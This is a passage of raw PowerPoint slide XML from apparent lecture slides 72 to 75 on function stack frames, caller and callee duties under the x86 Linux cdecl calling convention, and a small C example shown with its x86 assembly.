          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allows us to allocate memory for the function's local variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, when considering calling a function, what other information do we need?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Return value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Our frame pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Return address (where to start program execution when function returns)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Local variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Temporary variables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="124028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Calling Convention</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All of the previous information must be stored on the stack in order to call the function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Who should store that information?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Caller?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Thus, we need to define a convention of who pushes/stores what values on the stack to call a function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Varies based on processor, operating system, compiler, or type of call</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1487609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x86 Linux Calling Convention (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cdecl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Caller (in this order)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pushes arguments onto the stack (in right to left order)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pushes address of instruction after call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Callee</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pushes previous frame pointer onto stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Creates space on stack for local variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ensures that stack is consistent on return</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Return value in %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> register</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1253374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954" y="305134"/>
            <a:ext cx="4229810" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">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int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">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a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">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b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>{   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pP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return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> a + b + 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> main()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>{   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>;   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  a = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(10, 40);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pP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return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> a;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5068261" y="190041"/>
            <a:ext cx="5832763" cy="666795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2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  push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mov</a:t>
            </a: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esp</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mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0xc(</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eax</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mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0x8(</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edx</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lea (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%edx</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%eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,1),</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eax</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add $0x1,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  pop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ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  push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mov</a:t>
            </a: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esp</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solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sub $0x18,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a: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movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0x28,0x4(</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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a: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movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0xa,(</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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>callee</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent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mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,-0x4(</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p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -0x4(</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ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  leave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
